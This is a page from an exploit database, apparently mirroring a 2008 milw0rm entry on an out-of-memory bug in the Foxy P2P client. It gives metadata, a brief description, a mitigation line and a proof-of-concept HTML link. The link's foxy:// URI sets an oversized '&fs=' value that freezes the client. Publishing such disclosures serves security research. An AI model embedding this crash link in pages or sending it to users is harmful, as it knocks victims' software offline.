header-logo
Suggest Exploit
vendor:
Foxy P2P
by:
Styxosaurus
7.5
CVSS
HIGH
Out of memory Exploit
119
CWE
Product Name: Foxy P2P
Affected Version From: Foxy P2P
Affected Version To: Foxy P2P
Patch Exists: YES
Related CWE: N/A
CPE: a:foxy_p2p:foxy_p2p
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

P2P Foxy Out of memory Exploit

Foxy is one of the most popular P2P software in Chinese users. It starts to request more memory and freeze as when '&fs=' meet some large magic point.

Mitigation:

Ensure that the application is not vulnerable to buffer overflow attacks by validating user input and using secure coding practices.
Source

Exploit-DB raw data:

P2P Foxy Out of memory Exploit

# Vulnerability Discovered by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Foxy is one of the most popular P2P software in Chinese users
# http://tw.gofoxy.net/
#
# It starts to request more memory and freeze 
# as when "&fs=" meet some large magic point.


<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4
&dn=music.wmv&fs=1000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
0000000000000000000000000'>Music.wmv</a>

# milw0rm.com [2008-06-17]

Navigation

Suggest Exploit

Services By CQR